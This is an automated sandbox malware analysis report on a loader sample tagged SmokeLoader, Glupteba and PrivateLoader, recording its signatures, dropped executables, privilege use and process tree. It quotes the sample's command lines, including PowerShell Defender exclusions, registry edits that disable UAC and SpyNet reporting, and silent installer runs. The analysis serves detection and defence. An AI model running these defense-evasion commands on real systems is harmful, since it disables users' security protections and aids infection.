Malware Analysis Report

2025-01-02 09:18

Sample ID 231007-a9zzzsgf2y
Target 127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d
SHA256 127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d
Tags
upx fabookie glupteba privateloader smokeloader pub1 backdoor dropper evasion loader spyware stealer themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d

Threat Level: Known bad

The file 127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d was found to be: Known bad.

Malicious Activity Summary

upx fabookie glupteba privateloader smokeloader pub1 backdoor dropper evasion loader spyware stealer themida trojan

SmokeLoader

Glupteba payload

Detect Fabookie payload

Fabookie

Glupteba

UAC bypass

PrivateLoader

Stops running service(s)

Modifies Windows Firewall

Downloads MZ/PE file

Themida packer

Reads user/profile data of web browsers

Loads dropped DLL

Drops startup file

UPX packed file

Executes dropped EXE

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Checks whether UAC is enabled

Looks up external IP address via web service

Launches sc.exe

Program crash

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

System policy modification

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-07 00:55

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-07 00:55

Reported

2023-10-07 00:58

Platform

win10-20230915-en

Max time kernel

10s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

PrivateLoader

loader privateloader

SmokeLoader

trojan backdoor smokeloader

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4JX5IZuR1L9zwH8lM5NsXAF.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtCEOMvP5mFMD47nZE0N7Vmd.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jxLP3VuA12vAGCLu0DiQOG1V.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GfStnCSODuMy0zJMXBmb8v3f.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2wa0gK2CD8MipOxEwxVi6YGI.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1sbtjpSxopfFDuC3xikuDgY1.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5I4SNp1K6yj1aUrfHxAQmaWf.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kijenzScoOktVerhmynMSqrj.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tAd2Pict3t7Qd0iSCOzIUvf1.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9YYXYifJSN9Di2qLTK2nrMeF.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\94pVqUcWIBqnfpKzzpEQvmhv.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe N/A
N/A N/A C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 644 wrote to memory of 712 N/A C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 644 wrote to memory of 712 N/A C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 644 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 644 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 644 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 644 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 644 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 644 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 644 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 644 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4176 wrote to memory of 3656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe \??\c:\windows\SysWOW64\reg.exe
PID 4176 wrote to memory of 3656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe \??\c:\windows\SysWOW64\reg.exe
PID 4176 wrote to memory of 3656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe \??\c:\windows\SysWOW64\reg.exe
PID 4176 wrote to memory of 5112 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe
PID 4176 wrote to memory of 5112 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe
PID 4176 wrote to memory of 5112 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe
PID 4176 wrote to memory of 3988 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe
PID 4176 wrote to memory of 3988 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe
PID 4176 wrote to memory of 3988 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe
PID 4176 wrote to memory of 4544 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\G2SZjKRUDxH7UjI0BHOtmDzT.exe
PID 4176 wrote to memory of 4544 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\G2SZjKRUDxH7UjI0BHOtmDzT.exe
PID 4176 wrote to memory of 4544 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\G2SZjKRUDxH7UjI0BHOtmDzT.exe
PID 4176 wrote to memory of 4068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\cVQuTwlBIqJuiJxb3lrvqGNO.exe
PID 4176 wrote to memory of 4068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\cVQuTwlBIqJuiJxb3lrvqGNO.exe
PID 4176 wrote to memory of 4068 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\cVQuTwlBIqJuiJxb3lrvqGNO.exe
PID 4176 wrote to memory of 4516 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe
PID 4176 wrote to memory of 4516 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe
PID 4176 wrote to memory of 4516 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe
PID 4176 wrote to memory of 5116 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VI9xk37vZ1hPxGyqkplQbk0H.exe
PID 4176 wrote to memory of 5116 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VI9xk37vZ1hPxGyqkplQbk0H.exe
PID 4176 wrote to memory of 5116 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VI9xk37vZ1hPxGyqkplQbk0H.exe
PID 4176 wrote to memory of 5084 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\BGFqRnDmzqygvUEXV8ibxwCU.exe
PID 4176 wrote to memory of 5084 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\BGFqRnDmzqygvUEXV8ibxwCU.exe
PID 4176 wrote to memory of 4492 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Iq5uaZWhDgUZkcNbrHwhNpCq.exe
PID 4176 wrote to memory of 4492 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Iq5uaZWhDgUZkcNbrHwhNpCq.exe
PID 3988 wrote to memory of 4140 N/A C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe
PID 3988 wrote to memory of 4140 N/A C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe
PID 3988 wrote to memory of 4140 N/A C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe
PID 5112 wrote to memory of 3400 N/A C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe C:\Users\Admin\AppData\Local\Temp\is-1VM64.tmp\is-0V4KQ.tmp
PID 5112 wrote to memory of 3400 N/A C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe C:\Users\Admin\AppData\Local\Temp\is-1VM64.tmp\is-0V4KQ.tmp
PID 5112 wrote to memory of 3400 N/A C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe C:\Users\Admin\AppData\Local\Temp\is-1VM64.tmp\is-0V4KQ.tmp
PID 4516 wrote to memory of 2840 N/A C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe C:\Users\Admin\AppData\Local\Temp\is-Q1HIR.tmp\c0is4o4zfXbtR2aLKnJyUN55.tmp
PID 4516 wrote to memory of 2840 N/A C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe C:\Users\Admin\AppData\Local\Temp\is-Q1HIR.tmp\c0is4o4zfXbtR2aLKnJyUN55.tmp
PID 4516 wrote to memory of 2840 N/A C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe C:\Users\Admin\AppData\Local\Temp\is-Q1HIR.tmp\c0is4o4zfXbtR2aLKnJyUN55.tmp
PID 3988 wrote to memory of 3964 N/A C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\xf08sdlOA2OHz3IrTpI6lnjC.exe
PID 3988 wrote to memory of 3964 N/A C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\xf08sdlOA2OHz3IrTpI6lnjC.exe
PID 3988 wrote to memory of 3964 N/A C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\xf08sdlOA2OHz3IrTpI6lnjC.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe

"C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\Pictures\AqX1vDOyZ5AE2GpB6E1KGAyf.exe

"C:\Users\Admin\Pictures\AqX1vDOyZ5AE2GpB6E1KGAyf.exe"

C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe

"C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\Pictures\BGFqRnDmzqygvUEXV8ibxwCU.exe

"C:\Users\Admin\Pictures\BGFqRnDmzqygvUEXV8ibxwCU.exe"

C:\Users\Admin\Pictures\cVQuTwlBIqJuiJxb3lrvqGNO.exe

"C:\Users\Admin\Pictures\cVQuTwlBIqJuiJxb3lrvqGNO.exe"

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe

"C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe" --silent --allusers=0

C:\Users\Admin\Pictures\G2SZjKRUDxH7UjI0BHOtmDzT.exe

"C:\Users\Admin\Pictures\G2SZjKRUDxH7UjI0BHOtmDzT.exe"

C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe

"C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe"

C:\Users\Admin\Pictures\VI9xk37vZ1hPxGyqkplQbk0H.exe

"C:\Users\Admin\Pictures\VI9xk37vZ1hPxGyqkplQbk0H.exe"

C:\Users\Admin\Pictures\Iq5uaZWhDgUZkcNbrHwhNpCq.exe

"C:\Users\Admin\Pictures\Iq5uaZWhDgUZkcNbrHwhNpCq.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\xf08sdlOA2OHz3IrTpI6lnjC.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\xf08sdlOA2OHz3IrTpI6lnjC.exe" --version

C:\Users\Admin\AppData\Local\Temp\7zSDCE3.tmp\Install.exe

.\Install.exe

C:\Program Files (x86)\OSNMount\OSNMount.exe

"C:\Program Files (x86)\OSNMount\OSNMount.exe" -i

C:\Users\Admin\AppData\Local\Temp\7zSE177.tmp\Install.exe

.\Install.exe /DdidCJjeH "385120" /S

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 29

C:\Users\Admin\Pictures\AqX1vDOyZ5AE2GpB6E1KGAyf.exe

"C:\Users\Admin\Pictures\AqX1vDOyZ5AE2GpB6E1KGAyf.exe"

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6d8a8538,0x6d8a8548,0x6d8a8554

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe

"C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3988 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231007005546" --session-guid=2d03b50d-c35d-4ba8-81ee-05d524f5afc1 --server-tracking-blob=NTcxODhkODU2MjdmZTYwZmNmZWE4YjFiOTljNGZjNjgzMWFhODlhMjgwODJiMmE1MTBiMGIwNTM4NmEyZmVjODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5NjY0MDEzOS40MTM3IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJmYTdmNzlmMy1hNzZmLTRjMWItYTg4Yy0yZTRhZTRjNTM3NzUifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7C04000000000000

C:\Users\Admin\AppData\Local\Temp\is-52LKL.tmp\_isetup\_setup64.tmp

helper 105 0x3B8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 29

C:\Users\Admin\Pictures\XPGL2Iq2vXRS7Z16Fr3fh9L6.exe

"C:\Users\Admin\Pictures\XPGL2Iq2vXRS7Z16Fr3fh9L6.exe"

C:\Users\Admin\AppData\Local\Temp\is-Q1HIR.tmp\c0is4o4zfXbtR2aLKnJyUN55.tmp

"C:\Users\Admin\AppData\Local\Temp\is-Q1HIR.tmp\c0is4o4zfXbtR2aLKnJyUN55.tmp" /SL5="$80216,5025136,832512,C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\AppData\Local\Temp\is-1VM64.tmp\is-0V4KQ.tmp

"C:\Users\Admin\AppData\Local\Temp\is-1VM64.tmp\is-0V4KQ.tmp" /SL4 $A0072 "C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe" 2846236 52224

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6f688538,0x6f688548,0x6f688554

C:\Program Files (x86)\OSNMount\OSNMount.exe

"C:\Program Files (x86)\OSNMount\OSNMount.exe" -s

C:\Users\Admin\Pictures\GX7zBMt5qEP7mvHo7sUjQ8oD.exe

"C:\Users\Admin\Pictures\GX7zBMt5qEP7mvHo7sUjQ8oD.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\system32\schtasks.exe

